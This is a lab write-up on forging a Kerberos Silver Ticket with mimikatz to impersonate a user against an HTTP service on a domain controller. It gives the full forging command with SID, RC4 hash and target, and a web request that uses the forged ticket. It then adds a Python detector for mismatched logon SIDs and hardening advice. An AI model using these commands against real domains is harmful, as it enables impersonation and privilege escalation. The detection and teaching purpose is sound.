Kerberos: Silver Tickets
This lab looks at the technique of forging a cracked TGS Kerberos ticket in order to impersonate another user and escalate privileges from the perspective of a service the TGS was cracked for.
I will be using mimikatz to create a Kerberos Silver Ticket - forging/rewriting the cracked ticket with some new details that benefit me as an attacker.
Below is a table with values supplied to mimikatz explained and the command itself:
Getting our user's SID as explained in the first step in the above table:
Getting a user's SID
Issuing the final mimikatz command to create our forged (silver) ticket:
mimikatz # kerberos::golden /sid:S-1-5-21-4172452648-1021989953-2368502130-1105 /domain:offense.local /ptt /id:1155 /target:dc-mantvydas.offense.local /service:http /rc4:a87f3a337d73085c45f9416be5787d86 /user:beningnadmin
Checking available tickets in memory with klist - note how the ticket shows our forged username benignadmin and a forged user id:
Note in the above mimikatz window the Group IDs which our fake user benignadmin is now a member of due to the forged ticket:
Initiating a request to the attacked service with the forged TGS ticket - note that the authentication is successful:
Invoke-WebRequest -UseBasicParsing -UseDefaultCredentials http://dc-mantvydas.offense.local
Note a network logon from benignadmin as well as the forged RIDs:
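As an added detection example (not part of the original lab), the following Python checks 4624 logon records for the account-name/SID disagreement this forged ticket produces: the name benignadmin arrives with RID 1155, a value chosen by the attacker rather than the RID the directory actually holds for that account. The directory snapshot, the account RIDs and the event records are constructed; only the domain portion of the SID is taken from the lab.

```python
import re

# Domain portion of the SID used in the lab (the trailing RID stripped off).
DOMAIN_SID = "S-1-5-21-4172452648-1021989953-2368502130"

# Constructed directory snapshot (username -> RID), standing in for an AD export.
# The RIDs below are assumed for the example; they are not the lab's real values.
DIRECTORY = {
    "administrator": 500,
    "spotless": 1105,
    "benignadmin": 1109,  # the real account's RID differs from the forged 1155
}

# Constructed 4624 records with the fields a SIEM would extract.
EVENTS = [
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "spotless",
     "TargetUserSid": f"{DOMAIN_SID}-1105"},
    # The silver-ticket network logon: name benignadmin, RID 1155 picked by the attacker.
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "benignadmin",
     "TargetUserSid": f"{DOMAIN_SID}-1155"},
    {"EventID": 4624, "LogonType": 2, "TargetUserName": "Administrator",
     "TargetUserSid": f"{DOMAIN_SID}-500"},
]

def rid_of(sid):
    """Return (domain_sid, rid) for a domain account SID, or None for
    well-known/local SIDs such as S-1-5-18 that carry no domain part."""
    m = re.fullmatch(r"(S-1-5-21-\d+-\d+-\d+)-(\d+)", sid)
    return (m.group(1), int(m.group(2))) if m else None

def check_logon(event, directory=DIRECTORY, domain_sid=DOMAIN_SID):
    """Return a reason string when the logon's name and SID disagree with the
    directory, else None. Only 4624 events for our own domain are inspected."""
    if event.get("EventID") != 4624:
        return None
    parsed = rid_of(event["TargetUserSid"])
    if parsed is None or parsed[0] != domain_sid:
        return None  # local or foreign-domain SID: out of scope here
    rid = parsed[1]
    name = event["TargetUserName"].lower()
    expected = directory.get(name)
    if expected is None:
        return f"unknown account {name!r} logged on with RID {rid}"
    if expected != rid:
        return f"{name!r} is RID {expected} in AD but the logon SID carries RID {rid}"
    return None

def find_forged_logons(events, directory=DIRECTORY):
    """List (name, sid, reason) for every event whose name/SID pair is inconsistent."""
    return [(e["TargetUserName"], e["TargetUserSid"], r)
            for e in events if (r := check_logon(e, directory))]
```

This is one signal only: an attacker who forges a name and RID that match a real account will not trip it, so it belongs alongside other checks such as unexpected group RIDs in the PAC.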
It is better not to use user accounts as service accounts, but if you do, make sure they have really strong passwords! Computer accounts generate long and complex passwords that change frequently, so they are better suited for running services. Better yet, follow good practice such as using Group Managed Service Accounts to run services more securely.